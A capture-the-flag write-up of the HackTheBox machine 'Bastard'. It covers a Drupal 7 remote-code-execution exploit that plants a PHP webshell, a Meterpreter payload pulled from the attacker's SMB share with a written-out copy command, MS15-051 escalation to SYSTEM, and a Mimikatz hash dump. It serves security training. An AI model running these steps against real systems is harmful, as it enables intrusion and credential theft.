HackTheBox - Bastard - 10.10.10.9

Bastard is a medium rated Windows Server 2008 R2 machine on hackthebox.eu.

Summary

Bastard is not overly challenging, however it requires some knowledge of PHP in order to modify and use the proof of concept required for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems.

Recon and Scanning

Nmap Results

From the ports shown here I can see that this is a Windows Box running IIS 7.5, meaning that we are dealing with a Windows Server 2008 R2 box.

Drupal Exploit

The fact that Drupal 7 is also listed bring to mind this exploit for Drupal 7.x CMS applications, allowing unauthenticated remote code execution. For the script to work we need to know the rest endpoint and the ip of the server, to find the rest endpoint I will use GoBuster with the dirbuster directory-list-2.3-medium.txt wordlist.

Directory Busting to find the REST endpoint

Bingo, we now have the url of the rest endpoint, /rest now we can download the exploit script and fill in the necessary paramaters.

Getting a Shell as iusr

Firstly we will need to download the php-curl library from apt, this can be done with:

Next, we need to modify the script from Exploit DB to include the rest endpoint, the ip of Bastard, the name of the php webshell to be placed and the contents of that php file, below are the values that I used.

Specifically I changed the contents of the webshell to be,

This will give us a nicer shell.

Running the Exploit

Now that we have modified our PHP script, we can run it with the following command:

Now if we visit the given URL and append ?cmd=whoami, we can see that we have a shell as nt authority\iusr

Priv Esc to Administrator

Generating a Meterpreter Payload

To start things of, I will generate a executable meterperter payload so that we can get a meterpreter session instead of this PHP webshell.

The command to generate a .exe payload is:

• Replacing LHOST with your HTB IP
• Replacing LPORT with a port of your choosing

Setting Up Metasploit

To get a Meterpreter session we first need to upload our msf.exe file to the server, for this I will use Impacket’s smbserver.py to spin up a smb share in our current working directory, then we will use the Windows copy command to get the file onto the machine.

To start a SMB Server simply run:

Now that the smb server is running we can enter copy \\10.10.14.23\evilshare\msf.exe msf.exe into our PHP webshell.

We can then open Metasploit console and use exploit/multi/handler to recieve the callback from our payload

Next, set the payload to the same as the one from msfvenom, windows/x64/meterpreter/reverse_tcp

• Set LHOST to your HTB IP
• Set LPORT to the one from MSFVenom
• Now type exploit to start the listner

Popping a Meterpreter Shell

Now that the listner is running, we can go back to our webshell and simply enter the msf.exe command like this:

Bingo! We got a Meterpreter Shell!

IUser to SYSTEM

Windows Exploit Suggester

As this is an older version of Windows Server, we will first load up the post/multi/recon/local_exploit_suggester to get a list of possible priv-escs

Unluckily, the exploit we need is not here, this is the exploit we need I found this out by trial and error as the system is an unpatched version of Server 2008 R2 it will be vulnerable to this exploit.

MS15-051 Metasploit Module

Luckily for us, Metasploit has a module for MS15-051, exploit/windows/local/ms15_051_client_copy_image

The parameters we need to set are:

• LHOST, our HTB IP
• LPORT, a local port of your choosing
• SESSION, our Meterpreter sesison number
• TARGET, 1 as we are attacking 64 bit Windows

A Meterpreter Session as SYSTEM

Now the options are set we can type exploit and wait for a reverse connection

Nice, we now have a shell as SYSTEM

User and Root Flags

We can also now get the root and user flags.

Beyond Root

Now that we have rooted the machine we can load the Mimikatz Meterpreter module and dump the SAM hashes.

Respect

If you enjoyed the write up or found it useful consider + repping my htb profile linked below:

Categories:

Updated: